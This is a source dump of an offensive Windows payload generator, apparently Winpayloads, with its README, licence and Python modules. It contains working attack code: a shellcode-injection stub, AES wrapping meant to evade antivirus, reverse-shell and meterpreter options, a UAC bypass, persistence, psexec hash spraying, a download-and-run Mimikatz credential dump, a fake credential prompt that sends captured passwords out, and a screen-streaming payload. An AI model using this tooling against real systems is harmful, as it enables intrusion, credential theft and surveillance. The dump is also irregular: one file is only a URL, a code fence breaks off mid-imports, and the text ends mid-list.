```
├── .gitignore
├── LICENCE
├── README.md
├── WinPayloads.py
├── lib
│   ├── __init__.py
│   ├── encrypt.py
│   ├── generatepayload.py
│   ├── help.py
│   ├── listener.py
│   ├── main.py
│   ├── menu.py
│   ├── payloadextras.py
│   ├── powershell
│   │   └── stager.ps1
│   ├── preparepayload.py
│   ├── psexec.py
│   ├── stager.py
│   └── startmetasploit.py
└── setup.sh
```

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
```
*.pyc
/lib/psexecspray.py
server.crt
server.key
/lib/sockets.py
```

--------------------------------------------------------------------------------
/LICENCE:
--------------------------------------------------------------------------------
Apache License

Version 2.0, January 2004

http://www.apache.org/licenses/

TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

1. Definitions.

"License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.

"Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.

"Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.

"You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.

"Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.

"Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.

"Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).

"Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.

"Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."

"Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.

2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.

3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.

4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:

You must give any other recipients of the Work or Derivative Works a copy of this License; and
You must cause any modified files to carry prominent notices stating that You changed the files; and
You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.

You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.

5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.

6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.

7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.

8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.

9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability.

END OF TERMS AND CONDITIONS

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Winpayloads - Python2.7
Undetectable Windows Payload Generation with extras Running on Python2.7

## As usual, Don't upload payloads to any online virus checkers
- Virus Total Detection - Updated 30/9/2016 - Detected by 8 AV
https://www.virustotal.com/en/file/23a24f99c3c6c00cd4bf6cb968f813ba2ceadfa846c7f169f412bcbb71ba6573/analysis/1475232549/

## For Fully Undetectable Payloads please use the stager functionality [Youtube Video](https://youtu.be/eRl5H5wHqKY)

## Features
* UACBypass - PowerShellEmpire https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.
* PowerUp - PowerShellEmpire https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.
* Invoke-Shellcode https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved.
* Invoke-Mimikatz https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved.
* Invoke-EventVwrBypass https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Matt Nelson (@enigma0x3)
* Persistence - Adds payload persistence on reboot
* Psexec Spray - Spray hashes until successful connection and psexec payload on target
* Upload to local webserver - Easy deployment
* Powershell stager - allows invoking payloads in memory & more

## Check out the Wiki for installation and more!
https://github.com/nccgroup/Winpayloads/wiki

![alt tag](https://raw.githubusercontent.com/Charliedean/charliedean.github.io/master/images/2016-02-16%2010_12_29-Kali2%20-%20VMware%20Workstation.png)

# Video and Information on Blog (OUTDATED)
https://charliedean.github.io

--------------------------------------------------------------------------------
/WinPayloads.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/python
from lib.main import *
from lib.payloadextras import *
from lib.startmetasploit import *
from lib.menu import *

try:
    # lib/psexecspray.py is git-ignored and written by setup.sh
    from lib.psexecspray import *
except:
    print t.bold_red + "[!] Rerun the setup.sh" + t.normal

if not re.search('winpayloads', os.getcwd().lower()):
    print t.bold_red + "[!!] Please Run From Winpayloads Dir" + t.normal
    sys.exit(1)

DIR = os.path.expanduser('~') + '/winpayloads'
if not os.path.isdir(DIR):
    os.mkdir(DIR)


try:
    print t.bold_green + "Checking if up-to-date || ctr + c to cancel" + t.normal
    checkupdate = subprocess.Popen(['git', 'pull', '--dry-run'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Checking...')
    while checkupdate.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()
    # a dry-run pull that would fetch anything reports it on stderr
    if checkupdate.stderr.read():
        updateornah = raw_input(t.bold_red + "Do you want to update WinPayloads? y/[n]: " + t.normal)
        if updateornah.lower() == "y":
            p = subprocess.Popen(['git', 'pull'])
            p.wait()
            print t.bold_yellow + "Re-run setup.sh and reload Winpayloads..." + t.normal
            sys.exit()
except KeyboardInterrupt:
    pass

# background asyncore loop for the stager listener (lib/listener.py)
from lib.listener import StartAsync
async = StartAsync()
async.start()

try:
    getAndRunMainMenu()
except KeyboardInterrupt:
    print t.bold_green + '\n[*] Cleaning Up\n' + t.normal
    subprocess.call(['rm *.rc'], shell=True,
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    subprocess.call(['rm *.ps1'], shell=True,
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    subprocess.call(['rm logdict*'], shell=True,
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    sys.exit()
```

--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/secretsquirrel/Winpayloads/d63d660826e7f4358e3845876fb730c66dd5345c/lib/__init__.py

--------------------------------------------------------------------------------
/lib/encrypt.py:
--------------------------------------------------------------------------------
```python
import Crypto.Cipher.AES as AES
import os
import random
import string


def randomVar():
    return ''.join(random.sample(string.ascii_lowercase, 8))


def randomJunk():
    newString = ''
    for i in xrange(random.randint(1, 10)):
        newString += ''.join(random.sample(string.ascii_lowercase, random.randint(1, 26)))
    return newString


def do_Encryption(payload):
    counter = os.urandom(16)
    key = os.urandom(32)

    randkey = randomVar()
    randcounter = randomVar()
    randcipher = randomVar()

    randdecrypt = randomJunk()
    randshellcode = randomJunk()

    randctypes = randomJunk()
    randaes = randomJunk()

    # Note for reviewers: the counter callback returns the same 16 bytes for
    # every block, so the CTR keystream repeats per block, and the key and
    # counter are written into the stub in the clear below. This wrapper is
    # obfuscation of the stub's text, not confidentiality.
    encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    encrypted = encrypto.encrypt(payload.replace('ctypes', randctypes).replace('shellcode', randshellcode))

    newpayload = "# -*- coding: utf-8 -*- \n"
    newpayload += "%s = '%s'\n" % (randomVar(), randomJunk())
    newpayload += "import Crypto.Cipher.AES as %s \nimport ctypes as %s \n" % (randaes, randctypes)
    newpayload += "%s = '%s'.decode('hex') \n" % (randkey, key.encode('hex'))
    newpayload += "%s = '%s'.decode('hex') \n" % (randcounter, counter.encode('hex'))
    newpayload += "%s = '%s'\n" % (randomVar(), randomJunk())
    newpayload += "%s = %s.new(%s , %s.MODE_CTR, counter=lambda: %s )\n" % (randdecrypt, randaes, randkey, randaes, randcounter)
    newpayload += "%s = %s.decrypt('%s'.decode('hex')) \n" % (randcipher, randdecrypt, encrypted.encode('hex'))
    newpayload += "exec(%s)" % randcipher
    return newpayload
```

--------------------------------------------------------------------------------
/lib/generatepayload.py:
--------------------------------------------------------------------------------
```python
from main import *
from payloadextras import *
from psexecspray import *
from startmetasploit import *
from generatepayload import *
from menu import *
from encrypt import *
from stager import *


METASPLOIT_Functions = {
    'reverse': {
        'uacbypass': METASPLOIT().metrev_uac,
        'allchecks': METASPLOIT().metrev_allchecks,
        'persistence': METASPLOIT().metrev_persistence,
        'normal': METASPLOIT().metrev_normal
    },
    'bind': {
        'uacbypass': METASPLOIT().metbind_uac,
        'allchecks': METASPLOIT().metbind_allchecks,
        'persistence': METASPLOIT().metbind_persistence,
        'normal': METASPLOIT().metbind_normal
    },
    'https': {
        'uacbypass': METASPLOIT().methttps_uac,
        'allchecks': METASPLOIT().methttps_allchecks,
        'persistence': METASPLOIT().methttps_persistence,
        'normal': METASPLOIT().methttps_normal
    },
    'dns': {
        'uacbypass': METASPLOIT().metdns_uac,
        'allchecks': METASPLOIT().metdns_allchecks,
        'persistence': METASPLOIT().metdns_persistence,
        'normal': METASPLOIT().metdns_normal
    },
    'nclistener': {
        'nclisten': METASPLOIT().nclisterner,
    }
}


def askAndReturnModules(shellcode, metasploit_type):
    if metasploit_type == 'nclistener':
        return (EXTRAS(shellcode).RETURN_EZ2READ_SHELLCODE(), METASPLOIT_Functions[metasploit_type]['nclisten'])
    else:
        want_UACBYPASS = raw_input(t.bold_red + '[*] Try UAC Bypass(Only Works For Local Admin Account)?' + t.bold_red + ' y/[n]:' + t.normal)
        if want_UACBYPASS.lower() == 'y':
            win7orwin10 = raw_input(t.bold_red + '[*] Windows 7 or 10?' + t.bold_red + ' 7/[10]:' + t.normal)
            if not win7orwin10:
                win7orwin10 = "10"
            return (EXTRAS(shellcode).UACBYPASS(win7orwin10), METASPLOIT_Functions[metasploit_type]['uacbypass'])

        want_ALLCHECKS = raw_input(t.bold_red + '[*] Invoke Priv Esc Checks? y/[n]:' + t.normal)
        if want_ALLCHECKS.lower() == 'y':
            return (EXTRAS(shellcode).ALLCHECKS(), METASPLOIT_Functions[metasploit_type]['allchecks'])

        want_PERSISTENCE = raw_input(t.bold_red + '[*] Persistent Payload on Boot? y/[n]:' + t.normal)
        if want_PERSISTENCE.lower() == 'y':
            return (EXTRAS(shellcode).PERSISTENCE(), METASPLOIT_Functions[metasploit_type]['persistence'])

        return (EXTRAS(shellcode).RETURN_EZ2READ_SHELLCODE(), METASPLOIT_Functions[metasploit_type]['normal'])


def GeneratePayload(ez2read_shellcode, payloadname, shellcode):
    with open('%s/payload.py' % payloaddir(), 'w+') as Filesave:
        Filesave.write(do_Encryption(SHELLCODE.injectwindows % (ez2read_shellcode)))
    print '[*] Creating Payload using Pyinstaller...'

    randomenckey = ''.join(random.sample(string.ascii_lowercase, 16))

    p = subprocess.Popen(['wine', os.path.expanduser('~') + '/.wine/drive_c/Python27/python.exe', '/opt/pyinstaller/pyinstaller.py',
                          '%s/payload.py' % payloaddir(), '--noconsole', '--onefile', '--key', randomenckey], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    LOADING = Spinner('Generating Payload')
    while p.poll() == None:
        LOADING.Update()
        time.sleep(0.2)
    print '\r',
    sys.stdout.flush()

    payloadstderr = p.stderr.read()
    if len(sys.argv) > 1:
        if sys.argv[1] == "-debug":
            sys.stdout.write(payloadstderr)
    os.system('mv dist/payload.exe %s/%s.exe' % (payloaddir(), payloadname))
    print t.normal + '\n[*] Payload.exe Has Been Generated And Is Located Here: ' + t.bold_green + '%s/%s.exe' % (payloaddir(), payloadname) + t.normal
    CleanUpPayloadMess(payloadname)
    from menu import clientMenuOptions
    if len(clientMenuOptions.keys()) > 2:
        DoClientUpload(payloaddir(), payloadname, powershellExec=ez2read_shellcode, isExe=True)
    else:
        DoPayloadUpload(payloadname)


def CleanUpPayloadMess(payloadname):
    os.system('rm dist -r')
    os.system('rm build -r')
    os.system('rm *.spec')
    os.system('rm %s/payload.py' % payloaddir())


def DoPayloadUpload(payloadname):
    want_to_upload = raw_input(
        '\n[*] Upload To Local Websever or (p)sexec? [y]/p/n: ')
    if want_to_upload.lower() == 'p' or want_to_upload.lower() == 'psexec':
        DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe')
    elif want_to_upload.lower() == 'y' or want_to_upload.lower() == '':
        FUNCTIONS().DoServe(FUNCTIONS().CheckInternet(), payloadname, payloaddir(), port=8000, printIt=True)


def DoClientUpload(payloaddir, payloadname, powershellExec, isExe):
    use_client_upload = raw_input(
        '\n[*] Upload Using Client Connection? [y]/n: ')
    if use_client_upload.lower() == 'y' or use_client_upload == '':
        from menu import clientMenuOptions
        for i in clientMenuOptions.keys():
            if i == 'back' or i == 'r':
                pass
            else:
                print t.bold_yellow + i + t.normal + ': ' + t.bold_green + clientMenuOptions[i]['payload'] + t.normal + '\n'
        while True:
            clientchoice = raw_input('>> ')
            try:
                clientnumber = clientMenuOptions[clientchoice]['params']
                break
            except:
                continue
        clientUpload((payloaddir + '/' + payloadname), clientnumber, powershellExec, isExe)
        print "Allow 20 seconds..."
        return clientnumber
```

--------------------------------------------------------------------------------
/lib/help.py:
--------------------------------------------------------------------------------
```python
from main import *

print_payloads = (
"""
+ Windows Reverse Shell
    - This payload will give the attacker a stageless reverse tcp shell
    - A listener will be automatically started using NetCat

+ Windows Reverse Meterpreter
    - This payload will give the attacker a staged reverse tcp meterpreter shell
    - A listener will be automatically started using Metasploit
    - All MODULES are available for this payload

+ Windows Bind Meterpreter
    - This payload will give the attacker a staged bind tcp meterpreter shell
    - Connection to the bind port will be automatically started using Metasploit
    - All MODULES are available for this payload

+ Windows Reverse Meterpreter HTTPS
    - This payload will give the attacker a staged reverse HTTPS meterpreter shell
    - A listener will be automatically started using Metasploit
    - All MODULES are available for this payload

+ Windows Reverse Meterpreter DNS
    - This payload will give the attacker a staged reverse tcp meterpreter shell with DNS name resolution
    - Good for dynamic ip addresses and persistence payloads
    - A listener will be automatically started using Metasploit
    - All MODULES are available for this payload
""")

print_modules = (
"""
+ UAC Bypass
    - This Module only works on Local Administrator Accounts
    - Using this module, PowerShellEmpire's UAC Bypass will execute on the target
    - This will bypass uac and create another session running as administrator
    - https://github.com/PowerShellEmpire/Empire

+ Priv Esc checks
    - Using this module, PowerShellEmpire's PowerUp AllChecks will execute on the target
    - This will find common privesc vulnerabilities on the target
    - https://github.com/PowerShellEmpire/Empire

+ Persistence
    - This module will run a powershell script on the target
    - Persistence adds registry keys and to the startup folder to automatically run the payload every time the target boots
""")

print_deployment = (
"""
+ SimpleHTTPServer
    - The payload will be hosted locally on a HTTP server

+ Psexec and Spraying
    - Spray hashes to find a vulnerable target
    - Psexec the payload to the target
    - Runs as system
""")

print_ps_menu = (
"""
+ Powershell Menu
    - Powershell payloads that are executed by Powershell

+ Reverse Powershell shell
    - Reverse powershell shell over tcp

+ Reverse Watch Screen
    - Streams the target's primary screen to your local machine over tcp

+ Ask creds
    - Keeps asking the target for their username and password until the correct credentials are entered.
    - Credentials are then sent over tcp
""")

print_stager = (
"""
+ Stager
    - Listener starts on port 5555 when starting winpayloads
    - Using the stager main menu item will print the encoded powershell stager command
    - This can then be used in a bat file or executed directly into a cmd prompt
    - A secure encrypted socket connection will be made back to winpayloads
    - Using the clients menu, you can interact with all the clients and drop into a shell
    - When a client has an active connection, all payloads can be executed on the target through the connection
    - Payloads will be invoked without touching disk and powershell payloads will be executed through the shell
    - Multiple payloads can be used while the client is connected
""")


def winpayloads_help():
    # headers now print the matching text (the original printed modules
    # under PAYLOADS and payloads under MODULES)
    print "\n|=------=|"
    print "|" + t.bold_green + "PAYLOADS" + t.normal + "|"
    print "|=------=|"
    print print_payloads
    print "\n|=-----=|"
    print "|" + t.bold_green + "MODULES" + t.normal + "|"
    print "|=-----=|"
    print print_modules
    print "\n|=--------=|"
    print "|" + t.bold_green + "DEPLOYMENT" + t.normal + "|"
    print "|=--------=|"
    print print_deployment
    print "\n|=--------=|"
    print "|" + t.bold_green + " PS MENU " + t.normal + "|"
    print "|=--------=|"
    print print_ps_menu
    print "\n|=--------=|"
    print "|" + t.bold_green + " STAGER " + t.normal + "|"
    print "|=--------=|"
    print print_stager
    return "pass"
```

--------------------------------------------------------------------------------
/lib/listener.py:
--------------------------------------------------------------------------------
```python
from stager import *
import threading

# shared asyncore socket map for every Server and Handler below
amap = {}


class StartAsync(threading.Thread):
    def __init__(self, map=amap):
        threading.Thread.__init__(self)
        self.setDaemon(True)
        self.map = map
        self.started = False

    def run(self):
        # asyncore.loop() returns once the map is empty; wait for a socket to
        # be registered, then run the loop again
        while True:
            if self.started:
                asyncore.loop(timeout=0.5, map=self.map)
                self.started = False
            else:
                while not self.map:
                    time.sleep(0.5)
                self.started = True


class Handler(asyncore.dispatcher):
    def __init__(self, clientconn, server, map):
        asyncore.dispatcher.__init__(self, sock=clientconn, map=map)
        self.server = server
        self.in_buffer = []
        self.out_buffer = []
        self.user_name = ''
        self.is_admin = ''

    def handle_close(self):
        print t.bold_red + "Client %s Connection Killed" % self.server.get_clientnumber() + t.normal
        self.close()

    def readable(self):
        return True

    def handle_read(self):
        data = self.recv(8000)
        if data:
            self.in_buffer.append(data)
            # the stager announces itself as "<user>:<isadmin>[#check#]"
            if '[#check#]' in data:
                self.user_name = "User:" + data.split(':')[0].replace('\x00', '').replace('[#check#]', '')
                self.is_admin = "Admin:" + data.split(':')[1].replace('\x00', '').replace('[#check#]', '')
                from menu import clientMenuOptions
                clientMenuOptions[self.server.get_clientnumber()] = {'payloadchoice': None, 'payload': str(self.getpeername()[0]) + ":" + str(self.getpeername()[1]), 'extrawork': interactShell, 'params': (self.server.get_clientnumber()), 'availablemodules': {self.user_name: '', self.is_admin: ''}}
                self.in_buffer = []

    def writable(self):
        return len(self.out_buffer) > 0

    def handle_write(self):
        sent = self.send(self.out_buffer.pop())


class Server(asyncore.dispatcher):
    want_read = want_write = True

    def __init__(self, host, port, bindsocket=False, relay=False, map=amap):
        asyncore.dispatcher.__init__(self, map=map)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.set_reuse_addr()
        self.handlers = {}
        self.clientnumber = 0
        self.bindsocket = bindsocket
        self.relay = relay
        self.map = map

        if self.bindsocket:
            self.bind((host, port))
            self.listen(30)
        elif self.relay:
            self.bind((host, port))
            self.listen(1)
        else:
            self.connect((host, port))

    def writable(self):
        return self.want_write

    def readable(self):
        return self.want_read

    def handle_connect(self):
        # client side: no cert_reqs is given, so the peer certificate is not
        # verified; TLSv1 only
        self.socket = ssl.wrap_socket(self.socket, ssl_version=ssl.PROTOCOL_TLSv1, ciphers='AES256', do_handshake_on_connect=False)
        print '[*] Connection to %s:%s' % (self.socket.getpeername())

    def _handshake(self):
        try:
            self.socket.do_handshake()
        except ssl.SSLError, err:
            self.want_read = self.want_write = False
            if err.args[0] == ssl.SSL_ERROR_WANT_READ:
                self.want_read = True
            elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                self.want_write = True
            else:
                raise
        else:
            self.clientnumber += 1
            handler = Handler(self.socket, self, map=self.map)
            self.handlers[self.clientnumber] = handler

    def handle_accept(self):
        if self.bindsocket:
            # server side: server.crt / server.key are git-ignored, generated by setup.sh
            self.socket = ssl.wrap_socket(self.socket, ssl_version=ssl.PROTOCOL_TLSv1, ciphers='AES256', server_side=True, certfile='server.crt', keyfile='server.key')
        clientconn, address = self.accept()
        if clientconn:
            print '[*] Connection from %s:%s' % (address)
            self.clientnumber += 1
            handler = Handler(clientconn, self, map=self.map)
            self.handlers[self.clientnumber] = handler

    def get_clientnumber(self):
        return str(self.clientnumber)

    # until the TLS handshake completes, reads and writes drive the handshake
    handle_read = handle_write = _handshake
```

--------------------------------------------------------------------------------
/lib/main.py:
--------------------------------------------------------------------------------
```python
# -*- coding: utf-8 -*-
import os
import socket
import re
import subprocess
import struct
import sys
import blessed
import random
import SimpleHTTPServer
```
import SocketServer
import multiprocessing
from Crypto.Cipher import AES
import base64
import string
import glob
import readline
import time
import psexec
import urllib2
from collections import OrderedDict
import string
import asyncore
import ssl
import threading
import prompt_toolkit

t = blessed.Terminal()

def payloaddir():
    return os.path.expanduser('~') + '/winpayloads'

class HANDLER(SimpleHTTPServer.SimpleHTTPRequestHandler): #patching httpserver to shutup
    def log_message(self, format, *args):
        return


class SHELLCODE(object):

    windows_ps_rev_watch_screen = (
        "Try{Add-Type -AssemblyName System.Windows.Forms;[System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream;"
        "$client = New-Object System.Net.Sockets.TCPClient('%s','%s');$stream = $client.GetStream();"
        "$ssl = New-Object System.Net.Security.SslStream $stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]);"
        "$ssl.AuthenticateAsClient($env:computername);Start-Sleep -s 1;function SendResponse($sock, $string){$bytesSent = $sock.Write($string)};"
        "function SendStrResponse($sock, $string){$bytesSent = $sock.Write([text.Encoding]::Ascii.GetBytes($string))};"
        "function SendHeader($sock,$length,$statusCode = \"200 OK\",$mimeHeader=\"text/html\",$httpVersion=\"HTTP/1.1\"){$response = \"HTTP/1.1 $statusCode`r`n\" + \"Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n\";"
        "SendStrResponse $sock $response;}SendHeader $ssl;"
        "While ($client.Connected){$b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);"
        "$g = [System.Drawing.Graphics]::FromImage($b);"
        "$g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size);"
        "$g.Dispose();$MemoryStream.SetLength(0);$b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg));"
        "$b.Dispose();$length = $MemoryStream.Length;[byte[]] $Bytes = $MemoryStream.ToArray();"
        "$str = \"`n`n--boundary`n\" + \"Content-Type: image/jpeg`n\" + \"Content-Length: $length`n`n\";"
        "SendStrResponse $ssl $str;SendResponse $ssl $Bytes};$MemoryStream.Close()}catch{Exit}")

    windows_ps_ask_creds_tcp = (
        "$ErrorActionPreference=\'SilentlyContinue\';Add-Type -assemblyname system.DirectoryServices.accountmanagement;"
        "$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine);"
        "$domainDN = \'LDAP://\' + ([ADSI]\'\').distinguishedName;"
        "$credential = $host.ui.PromptForCredential(\'Credentials are required to perform this operation!\', \'\', \'\', \'\');"
        "if($credential){$creds = $credential.GetNetworkCredential();$user = $creds.username;$pass = $creds.password;"
        "echo \' INCORRECT:\'$user\':\'$pass;"
        "$authlocal = $DS.ValidateCredentials($user, $pass);"
        "$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass);"
        "if(($authlocal -eq $true) -or ($authdomain.name -ne $null)){"
        "echo \' CORRECT:\'$user\':\'$pass}}")


    windows_invoke_mimikatz = (
        "IEX (New-Object Net.WebClient).DownloadString(\\\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1\\\");"
        "Invoke-Mimikatz -DumpCreds")

    injectwindows = """shellcode = bytearray('%s')
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
"""


class FUNCTIONS(object):

    def powershellShellcodeLayout(self,powershellExec):
        powershellShellcode = re.sub(r'\\x', '0x', powershellExec)
        count = 0
        newpayloadlayout = ''
        for char in powershellShellcode:
            count += 1
            newpayloadlayout += char
            if count == 4:
                newpayloadlayout += ','
                count = 0
        return newpayloadlayout

    def CheckInternet(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(('8.8.8.8', 0))
            IP = s.getsockname()[0]
            return IP
        except:
            return "0.0.0.0"

    def ServePayload(self, payloaddirectory, port):
        try:
            os.chdir(payloaddirectory)
            httpd = SocketServer.TCPServer(('', port), HANDLER)
            httpd.serve_forever()
        except:
            print t.bold_red + '\n[*] WebServer Error' + t.normal

    def DoServe(self, IP, payloadname, payloaddir, port, printIt):
        if printIt:
            print t.bold_green + "\n[*] Serving Payload On http://%s:%s/%s.exe" % (IP, port, payloadname) + t.normal
        a = multiprocessing.Process(
            target=self.ServePayload, args=(payloaddir, port))
        a.daemon = True
        a.start()

    def randomUnusedPort(self):
        s = socket.socket()
        s.bind(('', 0))
        port = s.getsockname()[1]
        s.close()
        return port

    def stagePowershellCode(self, powershellFileContents, port):
        DIR = 'stager'
        if not os.path.isdir(DIR):
            os.mkdir(DIR)
        os.chdir(DIR)
        with open('stage.ps1','w') as psFile:
            psFile.write(powershellFileContents)
        httpd = SocketServer.TCPServer(('', port), HANDLER)
        httpd.handle_request()
        os.chdir('..')
        import shutil
        shutil.rmtree(DIR)

class Spinner(object):

    def __init__(self,text):
        self.spinner = [
            ["|", "\\", "-", "/"],
            ["▁","▃","▄","▅","▆","▇","█","▇","▆","▅","▄","▃"],
            ["◡◡", "⊙⊙", "◠◠"],
            ["◐","◓","◑","◒"],
            ["▉","▊","▋","▌","▍","▎","▏","▎","▍","▌","▋","▊","▉"],
            [".","o","O","@","*"],
            ["◴","◷","◶","◵"],
            ["▖","▘","▝","▗"],
